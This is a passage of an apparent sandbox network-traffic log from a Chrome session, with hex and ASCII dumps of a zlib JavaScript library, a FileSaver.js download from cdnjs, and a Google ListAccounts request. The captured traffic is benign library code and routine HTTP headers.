                                                                  2023-04-26 07:00:20 UTC4953INData Raw: 74 22 3b 76 61 72 20 61 3d 65 28 22 2e 2f 7a 6c 69 62 2f 64 65 66 6c 61 74 65 22 29 2c 6f 3d 65 28 22 2e 2f 75 74 69 6c 73 2f 63 6f 6d 6d 6f 6e 22 29 2c 75 3d 65 28 22 2e 2f 75 74 69 6c 73 2f 73 74 72 69 6e 67 73 22 29 2c 69 3d 65 28 22 2e 2f 7a 6c 69 62 2f 6d 65 73 73 61 67 65 73 22 29 2c 73 3d 65 28 22 2e 2f 7a 6c 69 62 2f 7a 73 74 72 65 61 6d 22 29 2c 68 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2c 66 3d 30 2c 6c 3d 2d 31 2c 64 3d 30 2c 63 3d 38 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 70 29 29 72 65 74 75 72 6e 20 6e 65 77 20 70 28 65 29 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 6f 2e 61 73 73 69 67 6e 28 7b 6c 65 76 65 6c 3a 6c 2c 6d 65 74 68 6f 64
                                                                  Data Ascii: t";var a=e("./zlib/deflate"),o=e("./utils/common"),u=e("./utils/strings"),i=e("./zlib/messages"),s=e("./zlib/zstream"),h=Object.prototype.toString,f=0,l=-1,d=0,c=8;function p(e){if(!(this instanceof p))return new p(e);this.options=o.assign({level:l,method
                                                                  2023-04-26 07:00:20 UTC4955INData Raw: 75 66 38 28 73 29 2c 69 2e 6e 65 78 74 5f 6f 75 74 3d 30 2c 69 2e 61 76 61 69 6c 5f 6f 75 74 3d 73 29 2c 31 21 3d 3d 28 72 3d 61 2e 64 65 66 6c 61 74 65 28 69 2c 6e 29 29 26 26 72 21 3d 3d 66 29 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 6e 45 6e 64 28 72 29 2c 21 28 74 68 69 73 2e 65 6e 64 65 64 3d 21 30 29 3b 30 21 3d 3d 69 2e 61 76 61 69 6c 5f 6f 75 74 26 26 28 30 21 3d 3d 69 2e 61 76 61 69 6c 5f 69 6e 7c 7c 34 21 3d 3d 6e 26 26 32 21 3d 3d 6e 29 7c 7c 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 6f 3f 74 68 69 73 2e 6f 6e 44 61 74 61 28 75 2e 62 75 66 32 62 69 6e 73 74 72 69 6e 67 28 6f 2e 73 68 72 69 6e 6b 42 75 66 28 69 2e 6f 75 74 70 75 74 2c 69 2e 6e 65 78 74 5f 6f 75 74 29 29 29 3a 74 68 69 73 2e 6f 6e 44 61 74 61 28
                                                                  Data Ascii: uf8(s),i.next_out=0,i.avail_out=s),1!==(r=a.deflate(i,n))&&r!==f)return this.onEnd(r),!(this.ended=!0);0!==i.avail_out&&(0!==i.avail_in||4!==n&&2!==n)||("string"===this.options.to?this.onData(u.buf2binstring(o.shrinkBuf(i.output,i.next_out))):this.onData(
                                                                  2023-04-26 07:00:20 UTC4959INData Raw: 2c 72 2b 6e 29 2c 69 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 73 3d 30 3b 73 3c 6e 3b 73 2b 2b 29 65 5b 69 2b 73 5d 3d 74 5b 72 2b 73 5d 7d 2c 66 6c 61 74 74 65 6e 43 68 75 6e 6b 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 69 2c 73 2c 61 3b 66 6f 72 28 74 3d 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 6e 2b 3d 65 5b 74 5d 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 61 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 6e 29 2c 74 3d 69 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 73 3d 65 5b 74 5d 2c 61 2e 73 65 74 28 73 2c 69 29 2c 69 2b 3d 73 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 20 61 7d 7d 2c 73 3d 7b 61 72 72 61 79 53 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 2c 69
                                                                  Data Ascii: ,r+n),i);else for(var s=0;s<n;s++)e[i+s]=t[r+s]},flattenChunks:function(e){var t,r,n,i,s,a;for(t=n=0,r=e.length;t<r;t++)n+=e[t].length;for(a=new Uint8Array(n),t=i=0,r=e.length;t<r;t++)s=e[t],a.set(s,i),i+=s.length;return a}},s={arraySet:function(e,t,r,n,i
                                                                  2023-04-26 07:00:20 UTC4963INData Raw: 72 5d 3d 3d 3d 68 5b 73 2b 31 5d 29 7b 73 2b 3d 32 2c 72 2b 2b 3b 64 6f 7b 7d 77 68 69 6c 65 28 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 68 5b 2b 2b 73 5d 3d 3d 3d 68 5b 2b 2b 72 5d 26 26 73 3c 64 29 3b 69 66 28 6e 3d 77 2d 28 64 2d 73 29 2c 73 3d 64 2d 77 2c 61 3c 6e 29 7b 69 66 28 65 2e 6d 61 74 63 68 5f 73 74 61 72 74 3d 74 2c 6f 3c 3d 28 61 3d 6e 29 29 62 72 65 61 6b 3b 63 3d 68 5b 73 2b 61 2d 31 5d 2c 70 3d 68 5b 73 2b 61 5d 7d 7d 7d 77 68
                                                                  Data Ascii: r]===h[s+1]){s+=2,r++;do{}while(h[++s]===h[++r]&&h[++s]===h[++r]&&h[++s]===h[++r]&&h[++s]===h[++r]&&h[++s]===h[++r]&&h[++s]===h[++r]&&h[++s]===h[++r]&&h[++s]===h[++r]&&s<d);if(n=w-(d-s),s=d-w,a<n){if(e.match_start=t,o<=(a=n))break;c=h[s+a-1],p=h[s+a]}}}wh
                                                                  2023-04-26 07:00:20 UTC4964INData Raw: 38 30 30 30 0d 0a 77 69 6e 64 6f 77 5b 73 2b 31 5d 29 26 65 2e 68 61 73 68 5f 6d 61 73 6b 3b 65 2e 69 6e 73 65 72 74 26 26 28 65 2e 69 6e 73 5f 68 3d 28 65 2e 69 6e 73 5f 68 3c 3c 65 2e 68 61 73 68 5f 73 68 69 66 74 5e 65 2e 77 69 6e 64 6f 77 5b 73 2b 62 2d 31 5d 29 26 65 2e 68 61 73 68 5f 6d 61 73 6b 2c 65 2e 70 72 65 76 5b 73 26 65 2e 77 5f 6d 61 73 6b 5d 3d 65 2e 68 65 61 64 5b 65 2e 69 6e 73 5f 68 5d 2c 65 2e 68 65 61 64 5b 65 2e 69 6e 73 5f 68 5d 3d 73 2c 73 2b 2b 2c 65 2e 69 6e 73 65 72 74 2d 2d 2c 21 28 65 2e 6c 6f 6f 6b 61 68 65 61 64 2b 65 2e 69 6e 73 65 72 74 3c 62 29 29 3b 29 3b 7d 77 68 69 6c 65 28 65 2e 6c 6f 6f 6b 61 68 65 61 64 3c 79 26 26 30 21 3d 3d 65 2e 73 74 72 6d 2e 61 76 61 69 6c 5f 69 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c
                                                                  Data Ascii: 8000window[s+1])&e.hash_mask;e.insert&&(e.ins_h=(e.ins_h<<e.hash_shift^e.window[s+b-1])&e.hash_mask,e.prev[s&e.w_mask]=e.head[e.ins_h],e.head[e.ins_h]=s,s++,e.insert--,!(e.lookahead+e.insert<b)););}while(e.lookahead<y&&0!==e.strm.avail_in)}function R(e,
                                                                  2023-04-26 07:00:20 UTC4968INData Raw: 61 73 74 5f 66 6c 75 73 68 3d 66 2c 68 2e 5f 74 72 5f 69 6e 69 74 28 74 29 2c 6c 29 3a 53 28 65 2c 6d 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 76 61 72 20 74 2c 72 3d 55 28 65 29 3b 72 65 74 75 72 6e 20 72 3d 3d 3d 6c 26 26 28 28 74 3d 65 2e 73 74 61 74 65 29 2e 77 69 6e 64 6f 77 5f 73 69 7a 65 3d 32 2a 74 2e 77 5f 73 69 7a 65 2c 45 28 74 2e 68 65 61 64 29 2c 74 2e 6d 61 78 5f 6c 61 7a 79 5f 6d 61 74 63 68 3d 75 5b 74 2e 6c 65 76 65 6c 5d 2e 6d 61 78 5f 6c 61 7a 79 2c 74 2e 67 6f 6f 64 5f 6d 61 74 63 68 3d 75 5b 74 2e 6c 65 76 65 6c 5d 2e 67 6f 6f 64 5f 6c 65 6e 67 74 68 2c 74 2e 6e 69 63 65 5f 6d 61 74 63 68 3d 75 5b 74 2e 6c 65 76 65 6c 5d 2e 6e 69 63 65 5f 6c 65 6e 67 74 68 2c 74 2e 6d 61 78 5f 63 68 61 69 6e 5f 6c 65 6e 67 74 68 3d 75 5b 74 2e
                                                                  Data Ascii: ast_flush=f,h._tr_init(t),l):S(e,m)}function P(e){var t,r=U(e);return r===l&&((t=e.state).window_size=2*t.w_size,E(t.head),t.max_lazy_match=u[t.level].max_lazy,t.good_match=u[t.level].good_length,t.nice_match=u[t.level].nice_length,t.max_chain_length=u[t.
                                                                  2023-04-26 07:00:20 UTC4972INData Raw: 2e 67 7a 69 6e 64 65 78 3c 6e 2e 67 7a 68 65 61 64 2e 63 6f 6d 6d 65 6e 74 2e 6c 65 6e 67 74 68 3f 32 35 35 26 6e 2e 67 7a 68 65 61 64 2e 63 6f 6d 6d 65 6e 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2e 67 7a 69 6e 64 65 78 2b 2b 29 3a 30 2c 49 28 6e 2c 73 29 7d 77 68 69 6c 65 28 30 21 3d 3d 73 29 3b 6e 2e 67 7a 68 65 61 64 2e 68 63 72 63 26 26 6e 2e 70 65 6e 64 69 6e 67 3e 69 26 26 28 65 2e 61 64 6c 65 72 3d 70 28 65 2e 61 64 6c 65 72 2c 6e 2e 70 65 6e 64 69 6e 67 5f 62 75 66 2c 6e 2e 70 65 6e 64 69 6e 67 2d 69 2c 69 29 29 2c 30 3d 3d 3d 73 26 26 28 6e 2e 73 74 61 74 75 73 3d 31 30 33 29 7d 65 6c 73 65 20 6e 2e 73 74 61 74 75 73 3d 31 30 33 3b 69 66 28 31 30 33 3d 3d 3d 6e 2e 73 74 61 74 75 73 26 26 28 6e 2e 67 7a 68 65 61 64 2e 68 63 72 63 3f 28 6e 2e 70
                                                                  Data Ascii: .gzindex<n.gzhead.comment.length?255&n.gzhead.comment.charCodeAt(n.gzindex++):0,I(n,s)}while(0!==s);n.gzhead.hcrc&&n.pending>i&&(e.adler=p(e.adler,n.pending_buf,n.pending-i,i)),0===s&&(n.status=103)}else n.status=103;if(103===n.status&&(n.gzhead.hcrc?(n.p
                                                                  2023-04-26 07:00:20 UTC4976INData Raw: 30 3d 3d 28 36 34 26 77 29 29 7b 62 3d 6d 5b 28 36 35 35 33 35 26 62 29 2b 28 63 26 28 31 3c 3c 77 29 2d 31 29 5d 3b 63 6f 6e 74 69 6e 75 65 20 74 7d 69 66 28 33 32 26 77 29 7b 72 2e 6d 6f 64 65 3d 31 32 3b 62 72 65 61 6b 20 65 7d 65 2e 6d 73 67 3d 22 69 6e 76 61 6c 69 64 20 6c 69 74 65 72 61 6c 2f 6c 65 6e 67 74 68 20 63 6f 64 65 22 2c 72 2e 6d 6f 64 65 3d 33 30 3b 62 72 65 61 6b 20 65 7d 79 3d 36 35 35 33 35 26 62 2c 28 77 26 3d 31 35 29 26 26 28 70 3c 77 26 26 28 63 2b 3d 7a 5b 6e 2b 2b 5d 3c 3c 70 2c 70 2b 3d 38 29 2c 79 2b 3d 63 26 28 31 3c 3c 77 29 2d 31 2c 63 3e 3e 3e 3d 77 2c 70 2d 3d 77 29 2c 70 3c 31 35 26 26 28 63 2b 3d 7a 5b 6e 2b 2b 5d 3c 3c 70 2c 70 2b 3d 38 2c 63 2b 3d 7a 5b 6e 2b 2b 5d 3c 3c 70 2c 70 2b 3d 38 29 2c 62 3d 5f 5b 63 26 76 5d
                                                                  Data Ascii: 0==(64&w)){b=m[(65535&b)+(c&(1<<w)-1)];continue t}if(32&w){r.mode=12;break e}e.msg="invalid literal/length code",r.mode=30;break e}y=65535&b,(w&=15)&&(p<w&&(c+=z[n++]<<p,p+=8),y+=c&(1<<w)-1,c>>>=w,p-=w),p<15&&(c+=z[n++]<<p,p+=8,c+=z[n++]<<p,p+=8),b=_[c&v]
                                                                  2023-04-26 07:00:20 UTC4981INData Raw: 2e 6d 73 67 3d 22 69 6e 63 6f 72 72 65 63 74 20 68 65 61 64 65 72 20 63 68 65 63 6b 22 2c 72 2e 6d 6f 64 65 3d 33 30 3b 62 72 65 61 6b 7d 69 66 28 38 21 3d 28 31 35 26 68 29 29 7b 65 2e 6d 73 67 3d 22 75 6e 6b 6e 6f 77 6e 20 63 6f 6d 70 72 65 73 73 69 6f 6e 20 6d 65 74 68 6f 64 22 2c 72 2e 6d 6f 64 65 3d 33 30 3b 62 72 65 61 6b 7d 69 66 28 66 2d 3d 34 2c 6b 3d 38 2b 28 31 35 26 28 68 3e 3e 3e 3d 34 29 29 2c 30 3d 3d 3d 72 2e 77 62 69 74 73 29 72 2e 77 62 69 74 73 3d 6b 3b 65 6c 73 65 20 69 66 28 6b 3e 72 2e 77 62 69 74 73 29 7b 65 2e 6d 73 67 3d 22 69 6e 76 61 6c 69 64 20 77 69 6e 64 6f 77 20 73 69 7a 65 22 2c 72 2e 6d 6f 64 65 3d 33 30 3b 62 72 65 61 6b 7d 72 2e 64 6d 61 78 3d 31 3c 3c 6b 2c 65 2e 61 64 6c 65 72 3d 72 2e 63 68 65 63 6b 3d 31 2c 72 2e 6d
                                                                  Data Ascii: .msg="incorrect header check",r.mode=30;break}if(8!=(15&h)){e.msg="unknown compression method",r.mode=30;break}if(f-=4,k=8+(15&(h>>>=4)),0===r.wbits)r.wbits=k;else if(k>r.wbits){e.msg="invalid window size",r.mode=30;break}r.dmax=1<<k,e.adler=r.check=1,r.m
                                                                  2023-04-26 07:00:20 UTC4985INData Raw: 5f 2b 37 3b 66 3c 7a 3b 29 7b 69 66 28 30 3d 3d 3d 6f 29 62 72 65 61 6b 20 65 3b 6f 2d 2d 2c 68 2b 3d 6e 5b 73 2b 2b 5d 3c 3c 66 2c 66 2b 3d 38 7d 66 2d 3d 5f 2c 6b 3d 30 2c 63 3d 31 31 2b 28 31 32 37 26 28 68 3e 3e 3e 3d 5f 29 29 2c 68 3e 3e 3e 3d 37 2c 66 2d 3d 37 7d 69 66 28 72 2e 68 61 76 65 2b 63 3e 72 2e 6e 6c 65 6e 2b 72 2e 6e 64 69 73 74 29 7b 65 2e 6d 73 67 3d 22 69 6e 76 61 6c 69 64 20 62 69 74 20 6c 65 6e 67 74 68 20 72 65 70 65 61 74 22 2c 72 2e 6d 6f 64 65 3d 33 30 3b 62 72 65 61 6b 7d 66 6f 72 28 3b 63 2d 2d 3b 29 72 2e 6c 65 6e 73 5b 72 2e 68 61 76 65 2b 2b 5d 3d 6b 7d 7d 69 66 28 33 30 3d 3d 3d 72 2e 6d 6f 64 65 29 62 72 65 61 6b 3b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 73 5b 32 35 36 5d 29 7b 65 2e 6d 73 67 3d 22 69 6e 76 61 6c 69 64 20 63
                                                                  Data Ascii: _+7;f<z;){if(0===o)break e;o--,h+=n[s++]<<f,f+=8}f-=_,k=0,c=11+(127&(h>>>=_)),h>>>=7,f-=7}if(r.have+c>r.nlen+r.ndist){e.msg="invalid bit length repeat",r.mode=30;break}for(;c--;)r.lens[r.have++]=k}}if(30===r.mode)break;if(0===r.lens[256]){e.msg="invalid c
                                                                  2023-04-26 07:00:20 UTC4989INData Raw: 2c 34 33 2c 35 31 2c 35 39 2c 36 37 2c 38 33 2c 39 39 2c 31 31 35 2c 31 33 31 2c 31 36 33 2c 31 39 35 2c 32 32 37 2c 32 35 38 2c 30 2c 30 5d 2c 4e 3d 5b 31 36 2c 31 36 2c 31 36 2c 31 36 2c 31 36 2c 31 36 2c 31 36 2c 31 36 2c 31 37 2c 31 37 2c 31 37 2c 31 37 2c 31 38 2c 31 38 2c 31 38 2c 31 38 2c 31 39 2c 31 39 2c 31 39 2c 31 39 2c 32 30 2c 32 30 2c 32 30 2c 32 30 2c 32 31 2c 32 31 2c 32 31 2c 32 31 2c 31 36 2c 37 32 2c 37 38 5d 2c 55 3d 5b 31 2c 32 2c 33 2c 34 2c 35 2c 37 2c 39 2c 31 33 2c 31 37 2c 32 35 2c 33 33 2c 34 39 2c 36 35 2c 39 37 2c 31 32 39 2c 31 39 33 2c 32 35 37 2c 33 38 35 2c 35 31 33 2c 37 36 39 2c 31 30 32 35 2c 31 35 33 37 2c 32 30 34 39 2c 33 30 37 33 2c 34 30 39 37 2c 36 31 34 35 2c 38 31 39 33 2c 31 32 32 38 39 2c 31 36 33 38 35 2c 32
                                                                  Data Ascii: ,43,51,59,67,83,99,115,131,163,195,227,258,0,0],N=[16,16,16,16,16,16,16,16,17,17,17,17,18,18,18,18,19,19,19,19,20,20,20,20,21,21,21,21,16,72,78],U=[1,2,3,4,5,7,9,13,17,25,33,49,65,97,129,193,257,385,513,769,1025,1537,2049,3073,4097,6145,8193,12289,16385,2
                                                                  2023-04-26 07:00:20 UTC4993INData Raw: 3b 66 6f 72 28 69 3d 75 3b 72 3d 65 2e 68 65 61 70 5b 31 5d 2c 65 2e 68 65 61 70 5b 31 5d 3d 65 2e 68 65 61 70 5b 65 2e 68 65 61 70 5f 6c 65 6e 2d 2d 5d 2c 42 28 65 2c 73 2c 31 29 2c 6e 3d 65 2e 68 65 61 70 5b 31 5d 2c 65 2e 68 65 61 70 5b 2d 2d 65 2e 68 65 61 70 5f 6d 61 78 5d 3d 72 2c 65 2e 68 65 61 70 5b 2d 2d 65 2e 68 65 61 70 5f 6d 61 78 5d 3d 6e 2c 73 5b 32 2a 69 5d 3d 73 5b 32 2a 72 5d 2b 73 5b 32 2a 6e 5d 2c 65 2e 64 65 70 74 68 5b 69 5d 3d 28 65 2e 64 65 70 74 68 5b 72 5d 3e 3d 65 2e 64 65 70 74 68 5b 6e 5d 3f 65 2e 64 65 70 74 68 5b 72 5d 3a 65 2e 64 65 70 74 68 5b 6e 5d 29 2b 31 2c 73 5b 32 2a 72 2b 31 5d 3d 73 5b 32 2a 6e 2b 31 5d 3d 69 2c 65 2e 68 65 61 70 5b 31 5d 3d 69 2b 2b 2c 42 28 65 2c 73 2c 31 29 2c 32 3c 3d 65 2e 68 65 61 70 5f 6c 65
                                                                  Data Ascii: ;for(i=u;r=e.heap[1],e.heap[1]=e.heap[e.heap_len--],B(e,s,1),n=e.heap[1],e.heap[--e.heap_max]=r,e.heap[--e.heap_max]=n,s[2*i]=s[2*r]+s[2*n],e.depth[i]=(e.depth[r]>=e.depth[n]?e.depth[r]:e.depth[n])+1,s[2*r+1]=s[2*n+1]=i,e.heap[1]=i++,B(e,s,1),2<=e.heap_le
                                                                  2023-04-26 07:00:20 UTC4996INData Raw: 37 31 37 0d 0a 29 2c 33 29 2c 54 28 65 2c 6c 2c 64 29 29 3a 28 53 28 65 2c 34 2b 28 6e 3f 31 3a 30 29 2c 33 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 69 3b 66 6f 72 28 53 28 65 2c 74 2d 32 35 37 2c 35 29 2c 53 28 65 2c 72 2d 31 2c 35 29 2c 53 28 65 2c 6e 2d 34 2c 34 29 2c 69 3d 30 3b 69 3c 6e 3b 69 2b 2b 29 53 28 65 2c 65 2e 62 6c 5f 74 72 65 65 5b 32 2a 66 5b 69 5d 2b 31 5d 2c 33 29 3b 46 28 65 2c 65 2e 64 79 6e 5f 6c 74 72 65 65 2c 74 2d 31 29 2c 46 28 65 2c 65 2e 64 79 6e 5f 64 74 72 65 65 2c 72 2d 31 29 7d 28 65 2c 65 2e 6c 5f 64 65 73 63 2e 6d 61 78 5f 63 6f 64 65 2b 31 2c 65 2e 64 5f 64 65 73 63 2e 6d 61 78 5f 63 6f 64 65 2b 31 2c 61 2b 31 29 2c 54 28 65 2c 65 2e 64 79 6e 5f 6c 74 72 65 65 2c 65 2e 64 79 6e 5f 64 74 72
                                                                  Data Ascii: 717),3),T(e,l,d)):(S(e,4+(n?1:0),3),function(e,t,r,n){var i;for(S(e,t-257,5),S(e,r-1,5),S(e,n-4,4),i=0;i<n;i++)S(e,e.bl_tree[2*f[i]+1],3);F(e,e.dyn_ltree,t-1),F(e,e.dyn_dtree,r-1)}(e,e.l_desc.max_code+1,e.d_desc.max_code+1,a+1),T(e,e.dyn_ltree,e.dyn_dtr
                                                                  2023-04-26 07:00:20 UTC4998INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.349704104.17.25.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:20 UTC4801OUTGET /ajax/libs/FileSaver.js/2.0.5/FileSaver.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2023-04-26 07:00:20 UTC4930INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:00:20 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"5fb68fc1-abd"
                                                                  Last-Modified: Thu, 19 Nov 2020 15:31:13 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: MISS
                                                                  Expires: Mon, 15 Apr 2024 07:00:20 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kqo6L%2FxyM6YWYW7WGA85SV7Z7WYmvG6Uqig1y4iIq%2BDG%2BgoIuwzdAogE8bRwYKriVwtHm6j2djSPk3tqRBlUtL6pd6V36iaWMMC96f6AzHjC6l%2F1O%2BZ4QfSmqRlb%2BovFVA7Pdor7"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 7bdcf2bd9c515b44-FRA
                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  2023-04-26 07:00:20 UTC4931INData Raw: 61 62 64 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 62 29 3b 65 6c 73 65 20 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 29 62 28 29 3b 65 6c 73 65 7b 62 28 29 2c 61 2e 46 69 6c 65 53 61 76 65 72 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2e 65 78 70 6f 72 74 73 7d 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 61 2c 62 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 62 3f 62 3d 7b 61 75 74 6f 42 6f 6d 3a 21 31 7d 3a 22 6f 62 6a 65 63 74 22
                                                                  Data Ascii: abd(function(a,b){if("function"==typeof define&&define.amd)define([],b);else if("undefined"!=typeof exports)b();else{b(),a.FileSaver={exports:{}}.exports}})(this,function(){"use strict";function b(a,b){return"undefined"==typeof b?b={autoBom:!1}:"object"
                                                                  2023-04-26 07:00:20 UTC4931INData Raw: 6d 6c 7c 5c 53 2a 5c 2f 5c 53 2a 5c 2b 78 6d 6c 29 5c 73 2a 3b 2e 2a 63 68 61 72 73 65 74 5c 73 2a 3d 5c 73 2a 75 74 66 2d 38 2f 69 2e 74 65 73 74 28 61 2e 74 79 70 65 29 3f 6e 65 77 20 42 6c 6f 62 28 5b 22 5c 75 46 45 46 46 22 2c 61 5d 2c 7b 74 79 70 65 3a 61 2e 74 79 70 65 7d 29 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 64 2e 6f 70 65 6e 28 22 47 45 54 22 2c 61 29 2c 64 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 3d 22 62 6c 6f 62 22 2c 64 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 64 2e 72 65 73 70 6f 6e 73 65 2c 62 2c 63 29 7d 2c 64 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 63 6f
                                                                  Data Ascii: ml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(a.type)?new Blob(["\uFEFF",a],{type:a.type}):a}function c(a,b,c){var d=new XMLHttpRequest;d.open("GET",a),d.responseType="blob",d.onload=function(){g(d.response,b,c)},d.onerror=function(){console.error("co
                                                                  2023-04-26 07:00:20 UTC4932INData Raw: 65 6e 42 6c 6f 62 22 69 6e 20 6e 61 76 69 67 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 69 66 28 67 3d 67 7c 7c 66 2e 6e 61 6d 65 7c 7c 22 64 6f 77 6e 6c 6f 61 64 22 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 66 29 6e 61 76 69 67 61 74 6f 72 2e 6d 73 53 61 76 65 4f 72 4f 70 65 6e 42 6c 6f 62 28 62 28 66 2c 68 29 2c 67 29 3b 65 6c 73 65 20 69 66 28 64 28 66 29 29 63 28 66 2c 67 2c 68 29 3b 65 6c 73 65 7b 76 61 72 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 69 2e 68 72 65 66 3d 66 2c 69 2e 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 69 29 7d 29 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 64 2c 65 2c 67 29
                                                                  Data Ascii: enBlob"in navigator?function(f,g,h){if(g=g||f.name||"download","string"!=typeof f)navigator.msSaveOrOpenBlob(b(f,h),g);else if(d(f))c(f,g,h);else{var i=document.createElement("a");i.href=f,i.target="_blank",setTimeout(function(){e(i)})}}:function(b,d,e,g)
                                                                  2023-04-26 07:00:20 UTC4933INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.349702142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:20 UTC4802OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                  Host: accounts.google.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 1
                                                                  Origin: https://www.google.com
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: empty
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
                                                                  2023-04-26 07:00:20 UTC4802OUTData Raw: 20
                                                                  Data Ascii:
